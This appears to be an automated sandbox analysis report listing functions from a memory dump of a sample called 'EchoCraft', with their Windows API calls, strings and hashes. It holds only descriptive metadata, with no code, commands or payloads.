Strings

ThumbnailClass, xrefs: 00AE5275, 00AE5308

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 62dba6f35de999e38c028f6605ca1c636ec8792c843f253357af88e4c6d7ba66
Instruction ID: b60c650f4569a89e654041a06b2db2f3ea6d9b3397c7013912dcad951c9dd73f
Opcode Fuzzy Hash: 62dba6f35de999e38c028f6605ca1c636ec8792c843f253357af88e4c6d7ba66
Instruction Fuzzy Hash: 38911171904B87AFD708DF35E990BAAB3A8FF41308F144529FA8583081EB31ED55CB91

Function 00B19316 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A823E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A823F2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B19362
GetFocus.USER32 ref: 00B19372
GetDlgCtrlID.USER32(00000000), ref: 00B1937D
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00B19425
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B194D7
GetMenuItemCount.USER32(?), ref: 00B194F4
GetMenuItemID.USER32(?,00000000), ref: 00B19504
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B19536
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B19578
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B195A9

Strings

0, xrefs: 00B194A7

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: e3ba60e17aafdef555abd5886227068793e71a77a590c111c95ace1e66d50aa3
Instruction ID: 56147ad09581f3f9fb586a4dbb7be9c8637e17f30a4b5d4e451d2239e7bfa22f
Opcode Fuzzy Hash: e3ba60e17aafdef555abd5886227068793e71a77a590c111c95ace1e66d50aa3
Instruction Fuzzy Hash: D98121715043819FDB21DF24D894AEB7BE9FF89314F80499DF984A7281DB30D981CBA2

Function 00AEC7A2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00B529B0,000000FF,00000000,00000030), ref: 00AEC81E
SetMenuItemInfoW.USER32(00B529B0,00000004,00000000,00000030), ref: 00AEC853
Sleep.KERNEL32(000001F4), ref: 00AEC865
GetMenuItemCount.USER32(?), ref: 00AEC8AB
GetMenuItemID.USER32(?,00000000), ref: 00AEC8C8
GetMenuItemID.USER32(?,-00000001), ref: 00AEC8F4
GetMenuItemID.USER32(?,?), ref: 00AEC93B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AEC981
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AEC996
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AEC9B7

Strings

0, xrefs: 00AEC7AF

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: cf57557d9b9584f6d706815e8dd3557688b70de82d2e792bd051959c0b9cd1c6
Instruction ID: ac30da941a7716ca3a49f65b47d6ca3974f4c8c20bdcd86a70dfc6aca12ac45e
Opcode Fuzzy Hash: cf57557d9b9584f6d706815e8dd3557688b70de82d2e792bd051959c0b9cd1c6
Instruction Fuzzy Hash: BE619E7190029AAFDF11CF69D988EFEBBB9FB05364F144055E841E7292DB34AD12CB60

Function 00AEE374 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AEE386
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AEE3AC
_wcslen.LIBCMT ref: 00AEE3B6
_wcsstr.LIBVCRUNTIME ref: 00AEE406
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AEE422

Strings

\VarFileInfo\Translation, xrefs: 00AEE41A
%u.%u.%u.%u, xrefs: 00AEE500
DefaultLangCodepage, xrefs: 00AEE485
StringFileInfo\, xrefs: 00AEE3F5
04090000, xrefs: 00AEE458

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: efa394287a0da452e563a3d159f1fe0f863972b96c7f9355a8348f67cf927071
Instruction ID: 5099ad5c35fa11b9aaccc79e56c4284436fce1112a56b7931669c5ddeffa6d63
Opcode Fuzzy Hash: efa394287a0da452e563a3d159f1fe0f863972b96c7f9355a8348f67cf927071
Instruction Fuzzy Hash: 844115326402047AEB01B7659D4AFFF37ACEF4A310F504469F501A71C2EF75AA0196B5

Function 00B0D3AE Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B0D3DE
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00B0D407
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B0D4C2

Part of subcall function 00B0D3AE: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00B0D424
Part of subcall function 00B0D3AE: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00B0D437
Part of subcall function 00B0D3AE: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B0D449
Part of subcall function 00B0D3AE: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00B0D47F
Part of subcall function 00B0D3AE: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00B0D4A2

RegDeleteKeyW.ADVAPI32(?,?), ref: 00B0D46D

Strings

advapi32.dll, xrefs: 00B0D432
RegDeleteKeyExW, xrefs: 00B0D443

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: f5fade5f69b5802ab57b6dcd8763f5e39a39f53e729f1b71025d5d4e61b6284e
Instruction ID: 298d7f7d5261487b348ad16057975d60c547aee47b0b0b97f8678d7175f0ce22
Opcode Fuzzy Hash: f5fade5f69b5802ab57b6dcd8763f5e39a39f53e729f1b71025d5d4e61b6284e
Instruction Fuzzy Hash: D7315C71A01129BBD7209B91DC88EEFBBBCEF55750F0041A5A906E3290DB34AA459AB0

Function 00AEEE87 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00AEEE8B

Part of subcall function 00A9EDA7: timeGetTime.WINMM(?,?,00AEEEAB), ref: 00A9EDAB

Sleep.KERNEL32(0000000A), ref: 00AEEEB8
EnumThreadWindows.USER32(?,Function_0006EE3C,00000000), ref: 00AEEEDC
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AEEEFE
SetActiveWindow.USER32 ref: 00AEEF1D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AEEF2B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00AEEF4A
Sleep.KERNEL32(000000FA), ref: 00AEEF55
IsWindow.USER32 ref: 00AEEF61
EndDialog.USER32(00000000), ref: 00AEEF72

Strings

BUTTON, xrefs: 00AEEEF0

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: a847664bbc59bce1816b4e8b525d06310caf80761f5b266ff59732f719014678
Instruction ID: 091768dd381bc4248f420b906d5b2f7f67f011e79581e867bca0a90912c70277
Opcode Fuzzy Hash: a847664bbc59bce1816b4e8b525d06310caf80761f5b266ff59732f719014678
Instruction Fuzzy Hash: 432190702143C5BFEB00AF31EC88B663BAAFB55B86B448058F502933B1CF759D04DA61

Function 00AEF1D3 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00AEF234
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00AEF24A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AEF25B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00AEF26D
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00AEF27E

Strings

play PlayMe, xrefs: 00AEF279
play PlayMe wait, xrefs: 00AEF268
status PlayMe mode, xrefs: 00AEF22F
close PlayMe, xrefs: 00AEF245, 00AEF272
alias PlayMe, xrefs: 00AEF20D
open , xrefs: 00AEF1E3

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 146ab91d98a7ed94e4562c5c57539234473ce68b6c01fcbc2311c218d2067baa
Instruction ID: 4dc096a47ac603bef0ee09d5423fb6afcf0fc2692ab3b242c4b48c046b939aeb
Opcode Fuzzy Hash: 146ab91d98a7ed94e4562c5c57539234473ce68b6c01fcbc2311c218d2067baa
Instruction Fuzzy Hash: 2F11C671AD41697DD720B366DC4AEFF6ABCEFD1B40F000469B901A20E1DFA05E05C6B1

Function 00AEA7B5 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00AEA836
SetKeyboardState.USER32(?), ref: 00AEA8A1
GetAsyncKeyState.USER32(000000A0), ref: 00AEA8C1
GetKeyState.USER32(000000A0), ref: 00AEA8D8
GetAsyncKeyState.USER32(000000A1), ref: 00AEA907
GetKeyState.USER32(000000A1), ref: 00AEA918
GetAsyncKeyState.USER32(00000011), ref: 00AEA944
GetKeyState.USER32(00000011), ref: 00AEA952
GetAsyncKeyState.USER32(00000012), ref: 00AEA97B
GetKeyState.USER32(00000012), ref: 00AEA989
GetAsyncKeyState.USER32(0000005B), ref: 00AEA9B2
GetKeyState.USER32(0000005B), ref: 00AEA9C0

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8c92df17268b51888320c4b2fd6479b8d27af68dc33d898306d879d80a4a98c4
Instruction ID: 05c7b70b53cd61d45fa38397d9cfed9d98674003f38c68bfb7aeee1c027f5148
Opcode Fuzzy Hash: 8c92df17268b51888320c4b2fd6479b8d27af68dc33d898306d879d80a4a98c4
Instruction Fuzzy Hash: 7F51B420A047C829FB35D7A289157EABFF49F21340F088599D5C25B1C3DA64BA4CCBA2

Function 00AE64E2 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00AE64FE
GetWindowRect.USER32(00000000,?), ref: 00AE6517
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00AE6575
GetDlgItem.USER32(?,00000002), ref: 00AE6585
GetWindowRect.USER32(00000000,?), ref: 00AE6597
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00AE65EB
GetDlgItem.USER32(?,000003E9), ref: 00AE65F9
GetWindowRect.USER32(00000000,?), ref: 00AE660B
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00AE664D
GetDlgItem.USER32(?,000003EA), ref: 00AE6660
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AE6676
InvalidateRect.USER32(?,00000000,00000001), ref: 00AE6683

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 57028e200b9b3a1a85c7a63424bbc7b0ce4698d41f116ccaa3438251827a9a84
Instruction ID: 20090180cc3f70441f710301daa32eca9adc9b71bc0bf72c2bf411f0af6d4bff
Opcode Fuzzy Hash: 57028e200b9b3a1a85c7a63424bbc7b0ce4698d41f116ccaa3438251827a9a84
Instruction Fuzzy Hash: 305133B1B00215AFDF18CF69DD89AAEBBB5FB58310F508529F919E7294DB709D00CB60

Function 00A816B2 Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8670F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A816CD,?,00000000,?,?,?,?,00A8169F,00000000,?), ref: 00A86772

DestroyWindow.USER32(?), ref: 00A81766
KillTimer.USER32(00000000,?,?,?,?,00A8169F,00000000,?), ref: 00A81800
DestroyAcceleratorTable.USER32(00000000), ref: 00AC2BFF
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A8169F,00000000,?), ref: 00AC2C2D
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A8169F,00000000,?), ref: 00AC2C44
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A8169F,00000000), ref: 00AC2C60
DeleteObject.GDI32(00000000), ref: 00AC2C72

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: bd99dcca74ba114b901fe8eb0fe3586c3983671918ec63b6953d68ab24e5f3bd
Instruction ID: b2b78b79771079f77d8d2bcc3539e86596abb9b01bd50a95ad1b9474446e90c3
Opcode Fuzzy Hash: bd99dcca74ba114b901fe8eb0fe3586c3983671918ec63b6953d68ab24e5f3bd
Instruction Fuzzy Hash: 5F619B31506700DFDB25AF14DA88B6977B5FF91316F64416CE0829B6A0CB74AC92DF80

Function 00A82078 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00A82184: GetWindowLongW.USER32(?,000000EB), ref: 00A82192

GetSysColor.USER32(0000000F), ref: 00A820A2

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a4e81f2793ecd40d6a33593d98c1ded9d723dd2e49463e88be32b519b8c10825
Instruction ID: ad389a071667d5b45543f458c3e0822d77fe810f0109bdec9bccde9fe3abf4b0
Opcode Fuzzy Hash: a4e81f2793ecd40d6a33593d98c1ded9d723dd2e49463e88be32b519b8c10825
Instruction Fuzzy Hash: 9541B431640650EFDF206F389C48BF97766AB52331F658359FAA29B2E1CB318D42DB10

Function 00AE0EFD Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AE0FC1
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AE0FDD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AE0FF9
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AE1023
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00AE104B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AE1056
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AE105B

Strings

\IPC$, xrefs: 00AE0FA3
SOFTWARE\Classes\, xrefs: 00AE0F2D
\CLSID, xrefs: 00AE0F43

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: b11ff4b338ec98b99b4f5d55df91805099390672fc0f72b528c4bd85a95624e0
Instruction ID: 2d917fc5623feb67a92697d29074019d45ed0aa706eca483efbdfc7fdb475950
Opcode Fuzzy Hash: b11ff4b338ec98b99b4f5d55df91805099390672fc0f72b528c4bd85a95624e0
Instruction Fuzzy Hash: 14410C72D10229ABCF21EBA4DD95DEEB7B8FF18700F444169E901A32A1DB709E44CB60

Function 00B14672 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B14717
CreateCompatibleDC.GDI32(00000000), ref: 00B1471E
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B14731
SelectObject.GDI32(00000000,00000000), ref: 00B14739
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B14744
DeleteDC.GDI32(00000000), ref: 00B1474E
GetWindowLongW.USER32(?,000000EC), ref: 00B14758
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00B1476E
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00B1477A

Strings

static, xrefs: 00B146AF

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: cc2b8960491902dfef69442448aa864edb74a9d6392166302d96331c10b0566a
Instruction ID: 3fd192f9d858ee9c405dbad7699a17285562cc393f327d52ac5d8c3cca9b13a5
Opcode Fuzzy Hash: cc2b8960491902dfef69442448aa864edb74a9d6392166302d96331c10b0566a
Instruction Fuzzy Hash: C5316C32100219BBDF129FA4DC48FDA3BA9FF0A325F514251FA54A61E0CB75DCA0DBA0

Function 00B04403 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B0442F
CoInitialize.OLE32(00000000), ref: 00B0445D
CoUninitialize.OLE32 ref: 00B04467
_wcslen.LIBCMT ref: 00B04500
GetRunningObjectTable.OLE32(00000000,?), ref: 00B04584
SetErrorMode.KERNEL32(00000001,00000029), ref: 00B046A8
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B046E1
CoGetObject.OLE32(?,00000000,00B20B5C,?), ref: 00B04700
SetErrorMode.KERNEL32(00000000), ref: 00B04713
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B04797
VariantClear.OLEAUT32(?), ref: 00B047AB

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 6564303da8d62f98b9c65c7e2b82902e962041ffdec2210ec768e58ef8a503a9
Instruction ID: d13134932289d40eab96d4965bc8cded9aa83576b0c14349258e254c32518b4f
Opcode Fuzzy Hash: 6564303da8d62f98b9c65c7e2b82902e962041ffdec2210ec768e58ef8a503a9
Instruction Fuzzy Hash: DFC149B1604305AFC700DF68C88492BBBE9FF89744F14499DF68A9B291DB71ED05CB52

Function 00AF8297 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00AF82F4
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AF8390
